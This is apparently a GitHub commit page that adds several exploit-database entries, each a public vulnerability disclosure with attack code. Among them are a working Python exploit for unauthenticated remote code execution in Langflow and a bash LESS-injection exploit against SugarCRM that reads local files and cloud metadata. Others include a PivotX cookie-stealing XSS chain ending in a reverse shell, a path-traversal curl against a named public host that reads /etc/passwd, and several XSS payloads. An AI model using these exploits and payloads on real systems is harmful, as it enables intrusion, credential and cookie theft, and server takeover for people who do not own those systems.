Skip to content

Commit d74f179

Browse files
author
certcc-ghbot
committed
Merge remote-tracking branch 'upstream/main'
2 parents bfdbdda + 08e51ef commit d74f179

File tree

12 files changed

+786
-1
lines changed

12 files changed

+786
-1
lines changed
Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,16 @@
1+
# Title: TOTOLINK N300RB 8.54 - Command Execution
2+
# Author: Skander BELABED - Magellan Sécurité
3+
# Date: 07/11/2025
4+
# Vendor: TOTOLINK
5+
# Product: N300RB
6+
# Firmware version: 8.54
7+
# CVE: CVE-2025-52089
8+
9+
## Description:
10+
A hidden remote support feature protected by a static secret in TOTOLINK
11+
N300RB firmware version 8.54 allows an authenticated attacker to execute
12+
arbitrary OS commands with root privileges.
13+
14+
# Reproduce:
15+
[href](
16+
https://0x09.dev/posts/toto_decouvre_une_interface_de_debug/)

exploits/multiple/remote/52366.txt

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
# Exploit Title: MikroTik RouterOS 7.19.1 - Reflected XSS
2+
# Google Dork: inurl:/login?dst=
3+
# Date: 2025-07-15
4+
# Exploit Author: Prak Sokchea
5+
# Vendor Homepage: https://mikrotik.com
6+
# Software Link: https://mikrotik.com/download
7+
# Version: RouterOS <= 7.19.1
8+
# Tested on: MikroTik CHR 7.19.1
9+
# CVE : CVE-2025-6563
10+
11+
# PoC:
12+
# Visit the following URL while connected to the vulnerable MikroTik hotspot service:
13+
# http://<target-ip>/login?dst=javascript:alert(3)
14+
15+
# A reflected XSS will be triggered when the dst parameter is not properly sanitized by the server-side logic.
16+
# This vulnerability requires user interaction (visiting the link) and may be used in phishing or redirection attacks.
17+
18+
# Notes:
19+
# This is a non-persistent reflected XSS. It is accepted due to the presence of a valid CVE (CVE-2025-6563),
20+
# and has been acknowledged by MikroTik as a valid issue.
Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE)
2+
# Date: July 2025
3+
# Exploit Author: HayToN
4+
# Vendor Homepage: https://github.com/pivotx
5+
# Software Link: https://github.com/pivotx/PivotX
6+
# Version: 3.0.0 RC3
7+
# Tested on: Debian 11, PHP 7.4
8+
# CVE : CVE-2025-52367
9+
10+
## Vulnerability Type:
11+
Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().
12+
13+
## Root Cause:
14+
In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping.
15+
16+
Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML). 'title' and 'subtitle' are rendered as raw HTML.
17+
18+
Note: If you are already admin, skip steps 1-7
19+
## Exploitation Steps:
20+
1. Login as an authenticated user (normal user, no need for admin).
21+
22+
2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page
23+
24+
3. Create locally a JavaScript file contaning cookie stealing code.
25+
For example: lol.js
26+
Containing:
27+
document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie;
28+
29+
4. In the "Subtitle" field, input the following payload(Be sure to change the file name as yours):
30+
31+
<script src="http://LOCAL_IP/lol.js"></script>
32+
33+
5. Publish the page.
34+
35+
6. When an admin views the published page in the blog, the XSS will execute in the admin’s context.
36+
37+
7. Using this XSS, send a payload to steal the admin's cookies, then insert the cookies on your site.
38+
39+
8. Navigate as admin, to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit index.php file
40+
41+
9. Edit index.php file to any php file you want to gain RCE on the target, could be with reverse shell or any other method.
42+
43+
10. Visit http://IP/PivotX/index.php and you should get a reverse shell :)
44+
45+
# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3

exploits/multiple/webapps/52364.py

Lines changed: 90 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,90 @@
1+
#!/usr/bin/env python3
2+
# Exploit Title: Langflow 1.2.x - Remote Code Execution (RCE)
3+
# Date: 2025-07-11
4+
# Exploit Author: Raghad Abdallah Al-syouf
5+
# Vendor Homepage: https://github.com/logspace-ai/langflow
6+
# Software Link: https://github.com/logspace-ai/langflow/releases
7+
# Version: <= 1.2.x
8+
# Tested on: Ubuntu / Docker
9+
# CVE: CVE-2025-3248
10+
11+
# Description:
12+
#Langflow exposes a vulnerable endpoint `/api/v1/validate/code` that improperly evaluates arbitrary Python code via the `exec()` function. An unauthenticated remote attacker can execute arbitrary system commands.
13+
14+
# Usage:
15+
#python3 cve-2025-3248.py http://target:7860 "id"
16+
17+
18+
19+
import requests
20+
import argparse
21+
import json
22+
from urllib.parse import urljoin
23+
from colorama import Fore, Style, init
24+
import random
25+
26+
init(autoreset=True)
27+
requests.packages.urllib3.disable_warnings()
28+
29+
BANNER_COLORS = [Fore.MAGENTA, Fore.CYAN, Fore.LIGHTBLUE_EX]
30+
31+
def show_banner():
32+
print(f"""{Style.BRIGHT}{random.choice(BANNER_COLORS)}
33+
╔════════════════════════════════════════════════════╗
34+
║ Langflow <= 1.2.x - CVE-2025-3248 ║
35+
║ Remote Code Execution via exposed API ║
36+
║ No authentication — triggers exec() call ║
37+
╚════════════════════════════════════════════════════╝
38+
Author: Raghad Abdallah Al-syouf
39+
{Style.RESET_ALL}""")
40+
41+
class LangflowRCE:
42+
def __init__(self, target_url, timeout=10):
43+
self.base_url = target_url.rstrip('/')
44+
self.session = requests.Session()
45+
self.session.verify = False
46+
self.session.headers = {
47+
"User-Agent": "Langflow-RCE-Scanner",
48+
"Content-Type": "application/json"
49+
}
50+
self.timeout = timeout
51+
52+
def run_payload(self, command):
53+
endpoint = urljoin(self.base_url, "/api/v1/validate/code")
54+
payload = {
55+
"code": (
56+
f"def run(cd=exec('raise Exception(__import__(\"subprocess\").check_output(\"{command}\", shell=True))')): pass"
57+
)
58+
}
59+
60+
print(f"{Fore.YELLOW}[+] Sending crafted payload to: {endpoint}")
61+
try:
62+
response = self.session.post(endpoint, data=json.dumps(payload), timeout=self.timeout)
63+
print(f"{Fore.YELLOW}[+] HTTP {response.status_code}")
64+
if response.status_code == 200:
65+
try:
66+
json_data = response.json()
67+
err = json_data.get("function", {}).get("errors", [""])[0]
68+
if isinstance(err, str) and err.startswith("b'"):
69+
output = err[2:-1].encode().decode("unicode_escape").strip()
70+
return output or "[!] No output returned."
71+
except Exception as e:
72+
return f"[!] Error parsing response: {e}"
73+
return "[!] Target may not be vulnerable or is patched."
74+
except Exception as e:
75+
return f"[!] Request failed: {e}"
76+
77+
def main():
78+
parser = argparse.ArgumentParser(description="PoC - CVE-2025-3248 | Langflow <= v1.2.x Unauthenticated RCE")
79+
parser.add_argument("url", help="Target URL (e.g., http://localhost:7860)")
80+
parser.add_argument("cmd", help="Command to execute remotely (e.g., whoami)")
81+
args = parser.parse_args()
82+
83+
show_banner()
84+
exploit = LangflowRCE(args.url)
85+
result = exploit.run_payload(args.cmd)
86+
87+
print(f"\n{Fore.GREEN}[+] Command Output:\n{Style.RESET_ALL}{result}")
88+
89+
if __name__ == "__main__":
90+
main()
Lines changed: 56 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,56 @@
1+
# Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection
2+
# Author: Egidio Romano aka EgiX
3+
# Email : n0b0d13s@gmail.com
4+
5+
# Software Link: https://www.sugarcrm.com
6+
# Affected Versions: All commercial versions before 13.0.4 and 14.0.1.
7+
# CVE Reference: CVE-2024-58258
8+
# Vulnerability Description:
9+
10+
User input passed through GET parameters to the /css/preview REST API
11+
endpoint is not properly sanitized before parsing it as LESS code. This can
12+
be exploited by remote, unauthenticated attackers to inject and execute
13+
arbitrary LESS directives. By abusing the @import LESS statement, an
14+
attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary
15+
local files on the web server, potentially leading to the disclosure of
16+
sensitive information.
17+
18+
# Proof of Concept:
19+
20+
#!/bin/bash
21+
22+
echo
23+
echo "+----------------------------------------------------------------------+";
24+
echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |";
25+
echo "+----------------------------------------------------------------------+";
26+
27+
if [ "$#" -ne 2 ]; then
28+
echo -ne "\nUsage.....: $0 <SugarCRM URL> <Local File or SSRF URL>\n"
29+
echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'"
30+
echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'"
31+
echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'"
32+
echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n"
33+
exit 1
34+
fi
35+
36+
urlencode() {
37+
echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g'
38+
}
39+
40+
INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//")
41+
RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1&param=${INJECTION}")
42+
43+
if echo "$RESPONSE" | grep -q "________"; then
44+
echo -e "\nOutput for '$2':\n"
45+
echo "$RESPONSE" | sed '/________/q' | grep -v '________'
46+
echo
47+
else
48+
echo -e "\nError: exploit failed!\n"
49+
exit 2
50+
fi
51+
52+
53+
54+
# Credits: Vulnerability discovered by Egidio Romano.
55+
# Original Advisory: http://karmainsecurity.com/KIS-2025-04
56+
# Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/
Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
2+
# Date: 2025-07-09
3+
# Exploit Author: Imraan Khan (Lich-Sec)
4+
# Vendor Homepage: https://wss.com/
5+
# Software Link: https://client.protop.co.za/
6+
# Version: v4.4.2-2024-11-27
7+
# Tested on: Ubuntu 22.04 / Linux
8+
# CVE: CVE-2025-44177
9+
# CWE: CWE-22 - Path Traversal
10+
11+
# Description:
12+
# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
13+
# An unauthenticated remote attacker can retrieve arbitrary files via
14+
# URL-encoded traversal sequences in the `/pt3upd/` endpoint.
15+
16+
# Vulnerable Endpoint:
17+
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
18+
Host: client.protop.co.za
19+
User-Agent: curl/8.0
20+
Accept: */*
21+
22+
# Example curl command:
23+
curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'
24+
25+
# Notes:
26+
# - Vulnerability confirmed on public instance at time of testing.
27+
# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
28+
# - The vendor was notified and a fix was issued.
29+
30+
# Disclosure Timeline:
31+
# - Discovered: 2025-03-13
32+
# - Disclosed to vendor: 2025-03-20
33+
# - CVE Assigned: 2025-07-01
34+
# - Public Disclosure: 2025-07-09
Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS
2+
# Google Dork: inurl:/wp-content/plugins/wp-publications/
3+
# Date: 2025-07-15
4+
# Exploit Author: Zeynalxan Quliyev
5+
# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
6+
# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
7+
# Version: <= 1.2
8+
# Tested on: WordPress 6.5.3 / Linux (Apache)
9+
# CVE: CVE-2024-11605
10+
11+
## Vulnerability Details
12+
13+
The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code.
14+
15+
This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).
16+
17+
---
18+
19+
## Proof of Concept (PoC)
20+
21+
1. SSH into the server and navigate to the plugin directory:
22+
```bash
23+
cd /var/www/html/wp-content/plugins/wp-publications/
24+
```
25+
26+
2. Run the following command to create a malicious BibTeX file:
27+
```bash
28+
touch "<img src=x onerror=alert('XSS')>.bib"
29+
```
30+
31+
3. Access the plugin's BibTeX browser via the following URL:
32+
```
33+
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
34+
```
35+
36+
4. The injected JavaScript will be executed, triggering the XSS payload:
37+
```javascript
38+
alert('XSS');
39+
```
40+
41+
---
42+
43+
## Impact
44+
45+
* Stored XSS (JavaScript) is executed in the context of the admin panel.
46+
* Bypasses `unfiltered_html` protection in multisite environments.
47+
* Can be used for privilege escalation, cookie theft, or injecting malicious content.
48+
49+
---
50+
51+
## Recommendation
52+
53+
Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.
54+
55+
---
56+
57+
## References
58+
59+
* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
60+
* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)

0 commit comments

Comments
 (0)